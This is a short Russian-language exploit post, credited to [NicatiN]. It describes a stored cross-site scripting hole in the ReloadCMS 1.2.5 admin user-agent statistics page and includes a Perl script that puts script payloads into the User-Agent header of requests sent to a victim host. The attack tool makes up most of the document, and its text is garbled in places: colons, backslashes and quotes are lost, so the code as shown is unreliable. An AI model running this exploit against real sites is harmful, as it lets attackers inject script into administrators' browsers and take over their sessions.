Уязвимость обнаружил [NicatiN]
В административном интерфейсе существует специальный инструмент, отображающий
статистику по пользователям и по броузерам которыми они пользуются. Поле agent
не достаточно фильтруется, и допускает внедрение кода, к примеру:
<script>0wned</script>
Сплоит
#!/usr/bin/perl
use IO
Socket;
$host=$ARGV[0];
$path=$ARGV[1];
$script=$ARGV[2];
sub banner()
{
print qq ~
[N] ReloadCMS 1.2.5 XSS TO ADMIN INJECT
Coded by [NicatiN] icq# 829192 http://nshell.h15.ru
join to irc at dalnet ru to nshell channel
Greetz to lwb,rst,m00,0xdeadbeef
to: k1ll (b33r we drinkz)
~
}
banner();
if (@ARGV<3 or @ARGV>3)
{
usage();
exit();
}
sub usage()
{
print qq ~
Usage: perl [sn] [host] [path] [script]
[sn] — scriptname
[host] — victim host
[path] — path of cms
[script] — script u want to include
|_
+--- : [1] <script>alert('0wned by me')</script>
[2] <h1>0wned By Me </h1>
Example: perl sp.pl www.reloadcms.com / 1
~
}
if ($script eq 1)
{
$script="<script>alert('0wned by me')</script>";
}
if ($script eq 2)
{
$script="<h1>0wned By Me </h1>";
}
$sock = IOSocketINET->new( Proto => «tcp», PeerAddr => «$host», PeerPort =>
«80»);
print « nn [~] Connecting to $host …n»;
if (!$sock)
{
print « [-] Failed to connect to $hostn»;
exit;
}
print « [+] Connected success…n»;
print « [~] Sending evl query…n»;
print $sock «GET $path HTTP/1.0n»;
print $sock «Host: $hostn»;
print $sock «Referer: $host rn»;
print $sock «User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU;
rv:1.7.12) Gecko/20050919 Firefox/1.0.7 $scriptn»;
print $sock «Connection: closenn»;
print « [+] $host 0wned done ;]n»;
print « [+] Now u must wait then admin goz to site statzn»;
